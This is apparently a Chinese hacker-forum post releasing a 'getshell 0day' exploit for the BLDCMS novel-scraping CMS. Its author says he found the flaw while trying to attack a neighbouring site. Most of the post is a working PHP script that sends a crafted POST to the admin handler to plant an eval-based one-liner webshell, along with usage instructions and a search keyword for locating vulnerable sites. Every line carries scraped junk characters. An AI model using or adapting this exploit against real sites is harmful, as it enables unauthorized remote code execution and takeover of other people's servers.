之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
! ?# g* v2 o& I8 a* u* Y% W6 B. n5 { R5 V5 s
3 g3 J2 S) X, m* k3 ]1 `
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
" C' b1 y. V0 S J4 z) M 9 m& K; g0 G i( }' d6 S
既然都有人发了 我就把我之前写好的EXP放出来吧 x0 C" K, [$ i5 z* O3 X
/ ?! N- x5 o4 Z$ Iview source print?01.php;">) E" p) G7 n2 E! ~ P
02.<!--?php
- A, B% T+ K; U" a* _/ ^1 {03.echo "-------------------------------------------------------------------8 N* B% H" K+ W& |/ D8 d$ s
04.
2 G( U1 r; N( Z6 c05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP6 j( X9 m! `0 \( y8 e* |
06. 8 R7 {* D: c6 k: D9 e' Q
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
1 F9 A# ]- `: h+ ]% a3 T08.
: ]4 A1 ?8 a) ?09.QQ:981009941\r\n 2013.3.21\r\n 6 t" g6 {8 `4 P% l# S$ r
10.
" m, J- w! u; _" U+ o6 Y& C9 ~( e11.
i4 M' h) ?2 V, R" o7 L12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
8 c$ G* d# b2 Z13. & x a/ c/ ^) [3 P* M7 e* M$ |
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
7 j# k0 A/ _: H! X15. 4 Y* l; n2 Q& H' X+ W
16.--------------------------------------------------------------------\r\n";0 I$ C+ Y+ ?. e& G$ b; b
17.$url=$argv[1];
9 s" C7 A) E) z. B+ F8 K h5 \18.$dir=$argv[2];: w; n: D t* G- H( s
19.$pass=$argv[3];
* |, j" K. ^7 X20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
$ V4 x E4 f- `21.if (emptyempty($pass)||emptyempty($url))
P# `; {6 s9 Z' Y22.{exit("请输入参数");}
]( y% }3 z7 C7 H23.else
/ r, _! H" V4 l7 {3 r24.{" \" u" ? L2 V5 I5 ]$ J; E+ w4 H3 ]
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
. Q( |3 P& B$ q5 }) P26. - o/ x$ P- }1 k4 E6 L
27.al;
4 M( @2 X/ o/ j; j" j# T28.$length = strlen($fuckdata);' z. u/ k, w$ Y% ]+ O5 u, g3 D
29.function getshell($url,$pass)' o7 X# s2 f9 A
30.{1 g1 z' C2 Y) t( g7 U6 K5 N
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
; f* h5 A/ l4 y) A% I5 O, _" f' h% G32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";! |/ k# c& M k0 T: L9 O
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
9 A9 ?8 C0 ~+ h3 }" z1 s' g34.$header .= "User-Agent: MSIE\r\n";6 B8 M) M* R: H2 @
35.$header .= "Host:".$url."\r\n";! A) x, o- N# X* W3 k
36.$header .= "Content-Length: ".$length."\r\n";
7 d! z0 f4 g+ i; M; `$ G37.$header .= "Connection: Close\r\n";
. O, B, n; J: l* K5 \38.$header .="\r\n"; Q# N; x' K$ T
39.$header .= $fuckdata."\r\n\r\n";7 k# _2 W) m! u& z
40.$fp = fsockopen($url, 80,$errno,$errstr,15);1 ]7 S; k# _2 F- [: k6 |& m
41.if (!$fp)
$ G9 e/ }6 r; B6 ~0 V' j+ E42.{" i) n: q: c9 A2 p
43.exit ("利用失败:请检查指定目标是否能正常打开");8 G* ^* x6 x' k5 \! k U7 K0 I$ X
44.}
' m' a$ u c2 U" [; L45.else{ if (!fputs($fp,$header))
4 I9 z' ]0 _" v# i46.{exit ("利用失败");}
8 q3 q' H1 a7 M7 M- s47.else
5 v5 B8 g/ L5 i/ N V48.{
7 Q9 k/ |, B E3 L; r i! h49.$receive = '';" \0 L/ ~& ^+ z- g# N6 W
50.while (!feof($fp)) {
: D% ~0 Y2 ]' Y51.$receive .= @fgets($fp, 1000);
3 `2 Z* s. U! Z1 O4 d2 w% Y: @" u52.}
, \8 l# j0 h7 q$ X4 F$ l53.@fclose($fp);3 a4 `3 ^" w% N) u
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标5 v% A4 r8 f/ t* r/ q
55. & ?% \9 t6 n5 j" y% ], X# t" V
56.GPC是否=off)";
0 o6 Q- R6 K$ L" X# z. \9 f) N57.}}; `9 m% Q7 w O9 X0 [2 F
58.}7 o0 I. s4 k; J5 n
59.}. y) i# {& o, `' l& h$ U
60.getshell($url,$pass);
I8 E9 L, {0 i8 {61.?-->
! v4 P4 g. e2 Q
) A$ W- x9 B# W6 J8 L
! V7 o! d9 | C5 X : D3 r1 l& E8 T5 b5 K- z6 k6 X3 S
by 数据流
* r4 \8 r1 f8 e" r- Z' D. \ |